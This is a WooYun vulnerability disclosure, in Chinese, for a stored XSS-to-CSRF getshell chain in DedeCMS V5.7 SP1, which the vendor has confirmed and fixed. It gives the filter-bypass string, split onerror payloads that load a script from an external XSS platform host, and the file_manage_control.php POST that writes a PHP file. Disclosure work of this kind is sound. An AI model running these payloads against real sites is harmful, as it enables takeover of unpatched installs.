当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065561

漏洞标题:DedeCMS-V5.7-UTF8-SP1 csrf getshell 无需会员中心

相关厂商:Dedecms

漏洞作者: 索马里的海贼

提交时间:2014-06-20 09:29

修复时间:2014-09-18 09:30

公开时间:2014-09-18 09:30

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-20: 细节已通知厂商并且等待厂商处理中
2014-06-23: 厂商已经确认,细节仅向厂商公开
2014-06-26: 细节向第三方安全合作伙伴开放
2014-08-17: 细节向核心白帽子及相关领域专家公开
2014-08-27: 细节向普通白帽子公开
2014-09-06: 细节向实习白帽子公开
2014-09-18: 细节向公众公开

简要描述:

最近csrf又火了哈,各种csrf脱裤。dede后台挺方便就直接写getshell了
一直在白盒今天试试黑盒 结果发现了这个问题
不用注册,3条请求getshell
测试版本号 20140612

详细说明:

在黑盒测试友情链接功能的时候发现filter的一个bug
网站logo处提交">_<'&quot;&lt;&gt;发现后台显示logo时居然成功引入了双引号闭合了src属性。

1.jpg


经过多次测试发现 只要单引号后面跟&quot;就能成功闭合双引号
于是提交测试代码

'&quot; onerror=alert(1);//


2.jpg


3.jpg


成功弹出了alert

漏洞证明:

先用xss平台创建一个项目,然后自定义代码这里用的pkav的post get模块
post

http://192.168.1.114/dede/file_manage_control.php


data

fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++


因为此处字符长度有限制所以将payload拆分为3段 分别提交

'&quot; onerror=s.src='http://xss平台/KCfTiA';//


'&quot; onerror=body.appendChild(s);//


'&quot; onerror=s=createElement('script');//


注意显示的顺序与提交的顺序是相反的 所以要把payload顺序倒过来
提交完后访问后台友情链接模块

4.jpg


可以看到访问了js 然后访问了file_manage_control.php
文件管理可以看到shell已经躺在目录里了

5.jpg

修复方案:

xss 过滤器

版权声明:转载请注明来源 索马里的海贼@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-06-23 18:22

厂商回复:

已经修复,感谢提交。

最新状态:

暂无